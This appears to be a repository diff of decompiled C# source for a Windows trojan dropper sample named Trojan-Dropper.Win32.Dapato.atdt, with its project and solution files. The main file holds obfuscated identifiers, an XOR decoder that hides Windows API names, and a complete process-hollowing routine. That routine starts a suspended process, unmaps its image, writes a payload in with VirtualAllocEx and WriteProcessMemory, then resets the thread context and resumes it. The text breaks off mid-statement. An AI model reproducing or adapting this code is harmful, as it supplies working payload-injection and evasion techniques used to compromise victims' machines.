<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="duggsaogahsoghasikgasg.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/Trojan-Dropper.Win32.Dapato.atdt.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "rCWkXKkHG", "Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.csproj", "{F8A86FB4-3A4D-4C04-8C2F-70DE68FDBE26}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F8A86FB4-3A4D-4C04-8C2F-70DE68FDBE26}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{F8A86FB4-3A4D-4C04-8C2F-70DE68FDBE26}.Debug|Any CPU.Build.0 = Debug|Any CPU
{F8A86FB4-3A4D-4C04-8C2F-70DE68FDBE26}.Release|Any CPU.ActiveCfg = Release|Any CPU
{F8A86FB4-3A4D-4C04-8C2F-70DE68FDBE26}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9/aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJ.cs
+178
View File
@@ -0,0 +1,178 @@
// Decompiled with JetBrains decompiler
// Type: YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ.aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk
// Assembly: rCWkXKkHG, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4D884AA0-6931-492A-BF88-91705CD23369
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.atdt-6d6f9fa7620cf0056d02556ff97c31ce6e6915683c9f12177fc6b506a2dc19c9.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Runtime.InteropServices;
using System.Text;
namespace YhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQ
{
public class aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk
{
public static string RqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVr(
string DataIn,
string CodeKey)
{
long num1 = checked ((long) Math.Round(unchecked ((double) Strings.Len(DataIn) / 2.0)));
long num2 = 1;
string str;
while (num2 <= num1)
{
int num3 = checked ((int) Math.Round(Conversion.Val("&H" + Strings.Mid(DataIn, (int) (2L * num2 - 1L), 2))));
int num4 = Strings.Asc(Strings.Mid(CodeKey, checked ((int) (unchecked (num2 % (long) Strings.Len(CodeKey)) + 1L)), 1));
str += Conversions.ToString(Strings.Chr(num3 ^ num4));
checked { ++num2; }
}
return str;
}
public static bool bmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPX(
byte[] pByteArray,
string pProcess0Injectto)
{
bool flag;
try
{
int int32 = BitConverter.ToInt32(pByteArray, 60);
aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.resmthrd resmthrd = aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh.UvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbN<aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.resmthrd>("kernel32", "ResumeThread");
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.CreateProcess createProcess = aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh.UvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbN<aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.CreateProcess>("kernel32", aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.RqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVr("110B33073B09081A3D1A33153C2D", "hRyVfOlX"));
int int16 = (int) BitConverter.ToInt16(pByteArray, checked (int32 + 6));
IntPtr nSize = new IntPtr(BitConverter.ToInt32(pByteArray, checked (int32 + 84)));
aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.getthrcontx getthrcontx = aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh.UvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbN<aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.getthrcontx>("kernel32", aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.RqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVr("031623333A1F23152834201830162F13", "vDsWgRmFtLwO"));
IntPtr zero1 = IntPtr.Zero;
if (createProcess((string) null, new StringBuilder(pProcess0Injectto), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] ctxt = new uint[179];
ctxt[0] = 65538U;
if (getthrcontx(pInfo[1], ctxt))
{
IntPtr baseAddr = new IntPtr(checked ((long) ctxt[41] + 8L));
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.nunmpsctn nunmpsctn = aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh.UvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbN<aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.nunmpsctn>("ntdll", "NtUnmapViewOfSection");
if (aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh.UvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbN<aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.rdprocssmr>("kernel32", aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.RqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVr("001132090007230B3005262037193C1F29", "mRtSmPuLhUvU"))(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && nunmpsctn(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(pByteArray, checked (int32 + 52)));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(pByteArray, checked (int32 + 80)));
IntPtr lpBaseAddress = aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh.UvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbN<aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vrtall>("kernel32", "VirtualAllocEx")(pInfo[0], num1, num2, 12288, 64);
aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.wrtproc wrtproc = aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh.UvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbN<aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.wrtproc>("kernel32", aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.RqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVr("1219211E373C3C192A143618050F3F033C0F", "qEkHjRlNvI"));
int lpNumberOfBytesWritten;
int num3 = wrtproc(pInfo[0], lpBaseAddress, pByteArray, checked ((uint) (int) nSize), lpNumberOfBytesWritten) ? 1 : 0;
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) pByteArray, checked (int32 + 248 + num5 * 40), (Array) dst, 0, 40);
byte[] numArray = new byte[checked (dst[4] - 1 + 1)];
Buffer.BlockCopy((Array) pByteArray, dst[5], (Array) numArray, 0, numArray.Length);
num2 = new IntPtr(checked (lpBaseAddress.ToInt32() + dst[3]));
num1 = new IntPtr(numArray.Length);
int num6 = wrtproc(pInfo[0], num2, numArray, checked ((uint) (int) num1), lpNumberOfBytesWritten) ? 1 : 0;
checked { ++num5; }
}
num2 = new IntPtr(checked ((long) ctxt[41] + 8L));
num1 = new IntPtr(4);
int num7 = wrtproc(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), checked ((uint) (int) num1), lpNumberOfBytesWritten) ? 1 : 0;
ctxt[44] = checked ((uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(pByteArray, int32 + 40)));
int num8 = aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh.UvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbN<aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.strthd>("kernel32", "SetThreadContext")(pInfo[1], ctxt) ? 1 : 0;
}
}
int num = (int) resmthrd(pInfo[1]);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
flag = false;
ProjectData.ClearProjectError();
goto label_10;
}
return true;
label_10:
return flag;
}
public class vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh
{
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryExA(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string uno,
IntPtr due,
aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh.xDDDDDDDD cinque);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr tre, [MarshalAs(UnmanagedType.VBByRefStr)] ref string quattro);
public static obj UvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLkkMUgJcIgxXxJDVFbLWcYjBPXYhGBdfMSltjPKLJOyGNdFEUKMEdGkiRFaQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbN<obj>(
string plib,
string pfunc)
{
return (obj) Marshal.GetDelegateForFunctionPointer(aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh.GetProcAddress(aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh.LoadLibraryExA(ref plib, (IntPtr) 0, aQHVfOOBBckxZsYwOaOMGYVrbmsozRSnoyWDgvcjCKzfabZeQJQtVGWadUtWClhWqgXlveeREeBOcKbNRqfcWolIeDJFQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuhUvRQsardhHhsmFCZuTLITkyUIRpjNPvQVdTyIIHLipwbnnEHKCapiSzDXzESPxLk.vYcqnWjJJksFhBgEWvWhbtdzjuzwIZnvwGeZCEkqKSInijhmXelCdcsikcCeJHpdxoftEmlZZBJVxRwVmymkewtQzLRNYpqMNXubFUBHaiYEyzxDnhoSteuyCsSuZKGtPFvKUDDpcDZmBhzlpPDBuNKgDbhdQUiEGPYTwNfzTNDirrpugZgLXXmqtlKZSCjmHjnCMhuh.xDDDDDDDD.LOAD_LIBRARY_AS_DATAFILE), ref pfunc), typeof 